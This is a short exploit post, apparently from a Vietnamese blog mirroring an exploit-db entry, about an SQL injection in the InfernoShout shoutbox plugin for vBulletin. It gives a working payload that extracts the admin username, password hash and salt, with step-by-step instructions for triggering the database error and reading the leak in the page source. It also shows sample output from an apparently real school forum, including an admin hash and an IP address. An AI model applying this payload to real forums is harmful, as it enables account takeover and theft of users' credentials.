# Found by: Luit
# Site: http://grifter.org
# E-Mail: luit@usa.com
# Date: 14/08/2012
------------------------
# Exploit:
SQL Injection code:
Code:
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#* Chỉnh sửa lại userid nếu khác.
Truy cập vào link này: infernoshout.php?do=options&area=commands
1. Chèn SQL code ở trên vào ô "Command Input" đầu tiên bên trái và điền bất cứ chữ gì vào ô "Command Output" đầu tiên bên phải.
2. Bấm "Save settings", bạn sẽ thấy trang thông báo lỗi "Database error".
3. Xem page-source rồi kéo xuống phía cuối trang, bạn sẽ thấy dữ liệu bạn muốn.
Ví dụ:
<!-- Database error in vBulletin 3.7.2: Invalid SQL: update infernoshoutusers set s_commands='a:1:{i:0;a:2:{s:5:"input";s:238:"' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#";s:6:"output";s:3:"aaa";}}' where s_user='0'; MySQL Error : Duplicate entry 'admin:1cd8934f10ed6b68dc693600440f07c1:)Xc~0' for key 1 Error Number : 1062 Request Date : Saturday, August 18th 2012 @ 07:13:30 PM Error Date : Saturday, August 18th 2012 @ 07:13:35 PM Script : http://www.thpt***.edu.vn/forum/infernoshout.php Referrer : http://www.thpt***.edu.vn/forum/infernoshout.php?do=options&area=commands IP Address : 123.23.249.18 Username : Chưa đăng ký Classname : vB_Database MySQL Version :--> Bug này khá nguy hiểm không kém bug search của vbb là mấy, theo mình thấy có rất nhiều forum sử dụng shoutbox này. Các bạn fix nhanh kẻo trễ...
Video demo: http://www.youtube.com/watch?v=g70_JaKnBbw
Chi tiết tại đây: http://www.exploit-db.com/exploits/20576/
0 nhận xét:
Đăng nhận xét